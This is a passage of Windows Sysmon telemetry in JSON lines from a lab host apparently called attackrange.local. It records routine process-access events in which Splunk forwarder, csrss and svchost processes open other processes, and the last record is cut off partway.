{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5085,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.944\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-001055160700}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.944","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-001055160700}","TargetProcessId":"4700","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5086,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.944\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-001055160700}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.944","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-001055160700}","TargetProcessId":"4700","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5087,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.944\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.944","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5088,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.944\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.944","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5089,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.944\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.944","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5090,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.944\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.944","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5091,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.944\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.944","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5092,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.944\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.944","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5093,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.944\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 